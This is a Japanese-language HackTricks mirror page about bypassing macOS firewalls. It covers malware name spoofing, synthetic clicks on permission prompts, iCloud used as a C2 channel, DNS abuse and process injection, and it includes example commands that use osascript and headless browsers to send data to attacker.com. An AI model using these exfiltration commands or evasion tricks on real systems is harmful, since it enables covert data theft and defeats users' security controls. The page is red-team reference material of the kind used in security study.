mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-17 06:28:27 +00:00
5.3 KiB
5.3 KiB
macOS ファイアウォールのバイパス
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式のPEASS & HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループに参加するか、テレグラムグループに参加する、またはTwitter 🐦 @carlospolopmをフォローする。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
見つかった技術
以下の技術は、いくつかのmacOSファイアウォールアプリで機能していることが確認されています。
ホワイトリスト名の悪用
- 例えば、
launchd
のようなmacOSのよく知られたプロセスの名前でマルウェアを呼び出す
シンセティッククリック
- ファイアウォールがユーザーに許可を求める場合、マルウェアで許可をクリックする
Apple署名済みバイナリの使用
curl
のようなものですが、whois
のような他のものもあります
よく知られたappleドメイン
ファイアウォールは、apple.com
や icloud.com
のようなよく知られたappleドメインへの接続を許可している可能性があります。そしてiCloudはC2として使用できます。
一般的なバイパス
ファイアウォールをバイパスするためのいくつかのアイデア
許可されたトラフィックの確認
許可されたトラフィックを知ることで、潜在的にホワイトリストに登録されているドメインや、それらにアクセスできるアプリケーションを特定するのに役立ちます。
lsof -i TCP -sTCP:ESTABLISHED
DNSの悪用
DNS解決は、おそらくDNSサーバーに接触することが許可される署名されたアプリケーション**mdnsreponder
**を介して行われます。
![](/Mirrors/hacktricks/media/commit/a9fd1f2eb62e157c03e98ba7790136e48b9763c7/.gitbook/assets/image%20%281%29%20%281%29%20%286%29.png)
ブラウザアプリ経由
- osascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
{% code overflow="wrap" %}
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
{% endcode %}
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
プロセスインジェクションを介して
任意のサーバーに接続が許可されているプロセスにコードをインジェクトできれば、ファイアウォールの保護をバイパスできる可能性があります:
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
参考文献
htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローになる方法を学ぶ!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを手に入れる
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループに参加するか、テレグラムグループに参加する、またはTwitter 🐦 @carlospolopmをフォローする。
- HackTricks および HackTricks Cloud githubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。